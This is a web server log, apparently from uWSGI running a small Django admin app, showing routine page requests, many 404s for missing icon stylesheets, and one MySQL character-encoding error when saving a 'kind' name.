+[pid: 2069|app: 0|req: 190/255] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:03 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 191/256] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:46:13 2021] GET /kind-manage/? => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 192/257] 219.228.146.146 () {48 vars in 987 bytes} [Thu Jan 14 07:46:13 2021] POST /kind-manage/ => generated 206836 bytes in 115 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 193/258] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 194/259] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 195/260] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 196/261] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 197/262] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 198/263] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 199/264] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:13 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 200/265] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:13 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 201/266] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:13 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 202/267] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:46:17 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 203/268] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 204/269] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 205/270] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 206/271] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 207/272] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 208/273] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 209/274] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 210/275] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:18 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 211/276] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:18 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 212/277] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:46:20 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 213/278] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 214/279] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 215/280] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 216/281] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 217/282] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:46:20 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 218/283] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 219/284] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 220/285] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:46:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 221/286] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:46:20 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 222/287] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 07:51:11 2021] GET /kind-manage/? => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 223/288] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 07:51:11 2021] POST /kind-manage/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/289] 219.228.146.156 () {40 vars in 930 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/290] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/291] 219.228.146.156 () {40 vars in 876 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/292] 219.228.146.156 () {40 vars in 893 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/293] 219.228.146.156 () {40 vars in 905 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/294] 219.228.146.156 () {40 vars in 911 bytes} [Thu Jan 14 07:51:11 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 224/295] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 225/296] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 226/297] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 227/298] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 228/299] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 229/300] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 230/301] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 231/302] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:51:11 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: -1|req: -1/303] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 07:51:11 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 232/304] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:51:11 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/305] 219.228.146.156 () {40 vars in 845 bytes} [Thu Jan 14 07:51:11 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/306] 219.228.146.156 () {40 vars in 857 bytes} [Thu Jan 14 07:51:11 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/307] 219.228.146.156 () {40 vars in 933 bytes} [Thu Jan 14 07:51:12 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/308] 219.228.146.156 () {40 vars in 855 bytes} [Thu Jan 14 07:51:12 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/309] 219.228.146.156 () {40 vars in 929 bytes} [Thu Jan 14 07:51:12 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 234/310] 219.228.146.156 () {40 vars in 933 bytes} [Thu Jan 14 07:51:14 2021] GET /kind-manage/? => generated 7356 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 234/311] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 07:51:14 2021] POST /kind-manage/? => generated 27 bytes in 21 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 235/312] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 236/313] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 237/314] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 238/315] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 239/316] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 240/317] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 40 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 241/318] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:51:14 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 243/320] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:51:14 2021] GET /static/css/spinners.css => generated 3516 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 243/320] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:51:14 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 244/321] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 07:51:19 2021] GET /announcement/ => generated 7421 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 245/322] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 246/323] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 247/324] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 248/325] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 249/326] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 250/327] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 251/328] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:51:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 252/329] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 07:51:19 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 253/330] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:51:19 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 255/331] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 07:51:29 2021] GET /announcement/? => generated 8247 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
